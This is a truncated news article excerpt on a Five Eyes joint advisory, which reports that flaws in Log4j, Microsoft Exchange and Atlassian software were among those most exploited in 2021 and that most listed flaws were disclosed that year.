Malicious cyber actors go after 2021's biggest misses, spend less time on the classics. Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021, according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting older vulns for which patches had been available for years. Of course, the US Cyb...